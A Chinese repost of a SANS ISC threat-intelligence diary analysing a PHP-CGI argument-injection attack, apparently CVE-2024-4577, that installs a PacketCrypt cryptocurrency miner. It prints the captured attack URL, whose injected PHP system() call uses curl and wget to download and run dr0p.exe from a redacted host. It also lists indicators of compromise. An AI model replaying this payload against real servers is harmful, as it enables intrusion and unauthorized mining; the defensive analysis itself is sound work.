免责声明
道一安全(本公众号)的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
正文
SANS DShield 项目收集了来自 DShield 项目参与者的各种日志。在查看“首次出现”的 URL 页面时,我发现了一个有趣的 URL 并深入调查。记录的 URL 如下:
/cgi-bin/php-cgi.exe?arg=%0aContent-Type:%20text/plain%0a%0a<?php%20system('curl%20-L%20-k%20-O%20http%3A%2F%2F[redacted]%2Fdr0p.exe%20%26%26%20.%2Fdr0p.exe%20%7C%7C%20wget%20--no-check-certificate%20http%3A%2F%2F[redacted]%2Fdr0p.exe%20%26%26%20
我们可以通过 CyberChef 或 Burp Decoder 等网络代理工具使其更易读:
/cgi-bin/php-cgi.exe?arg=
Content-Type: text/plain
<?php system('curl -L -k -O http://[redacted]/dr0p.exe && ./dr0p.exe || wget --no-check-certificate http://[redacted]/dr0p.exe &&
顾名思义,这似乎是一个旨在下载二级有效载荷的可执行文件。对文件名进行快速搜索后,发现了一个最近提交到 VirusTotal(VT)的样本1,其 SHA256 哈希值为
d078d8690446e831acc794ee2df5dfabcc5299493e7198993149e3c0c33ccb36。
经过简短的动态恶意软件逆向工程,我们得到了一些非常有趣的发现。首先,dr0p.exe 从 23.27.51.244 获取了一个名为 pkt1.exe(e3d0c31608917c0d7184c220d2510848f6267952c38f86926b15fb53d07bd562)的二级文件。根据 Shodan 的查询结果(参见图 1),这个位于美国的 IP 地址开放了 4 个端口(22、80、110 和 6664),并且在 80 端口上运行着 EvilBit Block Explorer。
在 Shodan 上查询 23.27.51.244
文件 pkt1.exe 进一步生成了一个名为 packetcrypt.exe 的可执行文件,并将一个 PacketCrypt(PKT Classic)钱包地址(pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a)作为参数传递。让我们通过原生的 PKT Classic(PKTC)区块链浏览器2查看一下到目前为止的挖矿情况。参见图 2,该钱包的主人目前似乎已经挖到了 5 个 PKTC(按当前价格计算大约为 0.0021785 USDT)。
PacketCrypt Classic(PKTC)钱包活动
观察到的网络 URL 活动似乎利用了存在漏洞(例如最近的 CVE-2024-4577)的 PHP 服务器或配置不当的 PHP 服务器,这些服务器出于只有系统所有者才知道的原因,允许公众无限制地访问 php-cgi.exe
。如果你已经有一段时间没有检查你的 PHP 服务器了(这本不应该发生!),也许这是提醒系统所有者修补和审计他们的网络服务器漏洞以及由加密货币矿工引起的意外性能问题的一个温和提示。
附注:在调查过程中,注意到 PacketCrypt(PKT)项目从工作量证明方法
入侵指标(IoCs):
23.27.51.244(获取 pkt1.exe 的 IP 地址)
d078d8690446e831acc794ee2df5dfabcc5299493e7198993149e3c0c33ccb36(dr0p.exe 的 SHA256 哈希值)
e3d0c31608917c0d7184c220d2510848f6267952c38f86926b15fb53d07bd562(pkt1.exe 的 SHA256 哈希值)
717fe92a00ab25cae8a46265293e3d1f25b2326ecd31406e7a2821853c64d397(packetcrypt.exe 的 SHA256 哈希值)
pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a(PKTC 钱包地址)
参考文献:
1. https://www.virustotal.com/gui/file/d078d8690446e831acc794ee2df5dfabcc5299493e7198993149e3c0c33ccb36
2.https://www.pkt.world/explorer?wallet=pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a&minutes=1440&pools=all
3. https://crypto.pkt.cash/announcements/pktclassic-adopts-new-ticker-pktc/
声明
本文来源于:
https://isc.sans.edu/diary/PacketCrypt+Classic+Cryptocurrency+Miner+on+PHP+Servers/31564/
本公众号仅作翻译整理
点分享
点收藏
点在看
点点赞
原文始发于微信公众号(道一安全):PHP服务器可能正在被挖矿!
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论